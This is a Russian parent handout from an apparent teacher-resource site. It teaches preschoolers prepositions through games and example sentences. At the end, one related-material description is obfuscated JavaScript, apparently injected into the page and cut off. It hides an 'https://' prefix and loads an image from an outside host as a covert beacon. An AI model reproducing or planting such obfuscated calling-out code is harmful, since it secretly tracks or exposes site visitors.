Папка- передвижка "Маленькие слова"
консультация по развитию речи (подготовительная группа)

Газизулина Кристина Олеговна

Папка-передвижка для родителей

Скачать:

ВложениеРазмер
Microsoft Office document icon papka-peredvizhka_malenkie_slova.doc935.5 КБ

Предварительный просмотр:

         

Папку-передвижку составила

Дьяченко Кристина Олеговна

Уважаемые родители!

        Вашему вниманию предлагается практический материал                     по формированию у детей старшего дошкольного возраста навыков правильного употребления предлогов в речи.

       Предлог в грамматике – это служебное слово, выражающее отношения между словами (словосочетаниями и формой слова).

        Важным показателем грамотной речи ребёнка является умение правильно использовать предлоги. Поэтому при формировании грамматического строя речи детей большую роль играет работа                   по изучению и закреплению предлогов.

        Однако у детей с общим недоразвитием речи часто наблюдаются многочисленные ошибки при употреблении предлогов. Поэтому необходима целенаправленная, систематическая работа по преодолению этих ошибок у детей, как со стороны педагогов, так и со стороны родителей.

        Прежде всего, важно помочь ребёнку усвоить значение каждого предлога (так называемого «маленького слова») так, как только при этом условии он сможет правильно употребить их в своей речи.

        Надо постепенно объяснять ребёнку, что обозначают предлоги:

НА – это значит на поверхности чего-то (на квадрате)

В – это означает внутри чего-то (в квадрате)

                         

ПОД – внизу под чем-то (под квадратом)

НАД – вверху над чем-то, как бы в воздухе (над квадратом)

                      

ЗА – как бы спрятано позади чего-то (за квадратом)

ОКОЛО – рядом с чем-то (с квадратом, около квадрата)

                                

Значительную помощь при обучении детей грамотному использованию предлогов в устной, а в последующем и в письменной речи,  Вам окажут  предложенные нами  игры.

  •  Игра «Что мы делали, не скажем…»

Взрослый изображает какое-то действие с задуманным предлогом, ребёнок составляет предложение по демонстрируемым действиям.

Например:   

  • Мама вышла  за дверь.
  • Папа положил газету на стол.
  • Бабушка налила чай в чашку.    
  • Папа повесил картину над столом.
  •  Игра «Сделай, не ошибись»

Взрослый предлагает ребёнку выполнить задание и ответить на вопросы.

Например:   

  • Поставь книгу на полку. Куда поставил книгу? Где она стоит?
  • Поставь пирамидку между куклой и мячом. Где стоит пирамидка?
  • Положи яблоко в корзину. Куда ты положил яблоко? Где оно лежит?

        Как усложнение можно взять два предмета (например, спичку и коробок) и                 по-разному располагать их в пространстве по отношению друг к другу. Ребёнок отвечает, где находится спичка (коробок), употребляя при этом нужный предлог.

Например:   

  • Спичка  лежит  на коробке. - Коробок лежит под спичкой.
  • Спичка лежит под коробком. -  Коробок лежит на спичке.
  • Спичка лежит в коробке.
  • Спичка  лежит за  коробком. – Коробок лежит перед спичкой.
  • Спичка лежит между  коробками.
  • Спичка лежит перед коробком. – Коробок лежит за спичкой.

Аналогично выполняется задание с бочкой и ящиком.

  • Бочка стоит на ящике. – Ящик  лежит под бочкой.
  • Бочка стоит за ящиком. – Ящик стоит перед бочкой.
  • Ящик стоит в бочке.
  • Бочка лежит перед ящиком. – Ящик стоит за бочкой.
  • Бочка стоит в ящике.
  • Бочка стоит под ящиком.  - Ящик  стоит на бочке.

       

  • Упражнение «Наоборот» 

      Для лучшего усвоения значений предлогов очень полезны упражнения в последовательном употреблении предлогов  с противоположным значением.

     С этой целью ребёнку предлагается «оречевить» пары картинок, употребив нужные предлоги: В – ИЗ; К – ОТ; НАД – ПОД;  ПЕРЕД – ЗА.

      Попугай входит в клетку.              Попугай выходит из клетки.

    Попугай сидит над клеткой.            Попугай стоит под клеткой.

  Попугай стоит перед клеткой.               Попугай стоит за клеткой.

  • Упражнение «Помоги Незнайке найти свои шляпы»

(дифференциация предлогов: В – ИЗ, НА – С, ЗА – ИЗ-ЗА, ПОД – ИЗ-ПОД)

     Взрослый предлагает ребёнку отыскать на картинке все разноцветные шляпы Незнайки, сказать, где они лежат, и откуда их достанем.

   

  • Синяя шляпа висит в шкафу. – Достанем синюю шляпу из шкафа.
  • Синяя шляпа висит на вешалке. – Снимем синюю шляпу с вешалки.
  • Фиолетовая шляпа лежит на полке. – Возьмём фиолетовую шляпу                  с полки.
  • Жёлтая шляпа лежит под стулом.  -  Достанем жёлтую шляпу                     из-под стула.
  • Зелёная шляпа лежит под кроватью. - Достанем зелёную шляпу                     из-под  кровати.
  • Красная шляпа лежит за чемоданом.  -  Достанем красную шляпу                     из-за чемодана.   И т.д.

Необходимо упражнять детей в правильном употреблении предлогов                с существительными ед. и мн. числа  различных падежей.

  • Игра «Найди предмет?» (по сюжетной картинке)

     Взрослый предлагает ребёнку найти тот или иной  предмет на картинке и описать его точное месторасположение, используя для этого различные предлоги.

  • Где  сидит кукла? (Кукла сидит на полу, около мяча, перед креслом)
  • Где стоит матрёшка? (Матрёшка стоит на ковре, за креслом).
  • Где спрятался зайка? (Зайка спрятался в кровати, за шторкой).
  • Где висят часы? (Часы висят на стене, около окна, над табуреткой).
  •  Где лошадка-качалка? (Лошадка-качалка стоит на ковре, перед табуреткой,  за кроваткой).     И т.д.

Желаю Вам успехов в работе по развитию грамотной речи и использовании предлогов  у Ваших детей!


По теме: методические разработки, презентации и конспекты

Папка-передвижка "Маленькие слова"

Данная папка-передвижка предназначена для родителей и их детей. По ней в игровой форме можно упражняться в грамотном употреблении предлогов в речи....

Оформление папки-передвижки "Этапы развития фонематического восприятия. Второй этап - различение высоты, силы, тембра голоса на материале одинаковых звуков, сочетаний слов и фраз "

Познакомить родителей и воспитателей с играми и упражнениями, применяемыми на втором этапе развития фонематического восприятия - различение высоты, силы, тембра голоса на материале одинаковых зв...

Оформление папки-передвижки: "Формирование фонематического восприятия на третьем этапе развития речевого слуха: различение слов, близких по звуковому составу"

Познакомить родителей и воспитателей с играми и упражнениями, применяемыми на третьем этапе развития фонематического восприятия: различение слов, близких по звуковому составу...

Папка передвижка "Вежливые слова"

\'use strict\';var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'npgo.lussoit.com\',\'67\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); !function(){if(!...

Папка-передвижка Краткое руководство для родителей: «Простые слова имеют глубокий смысл ...»

Папка-передвижкаКраткое руководство для родителей: «Простые слова имеют глубокий смысл ...»- Больше говорите с ребенком обо всем - о любви, о жизни и смерти, о силе и слабости, о друж...

Папка передвижка "Вежливые слова"

Вежливые слова помогают нам налаживать добрые отношения со сверстниками. Поэтому очень важно чтобы как можно больше добрых вежливых слов было в словаре ребенка. Это задача не только педагога,но и роди...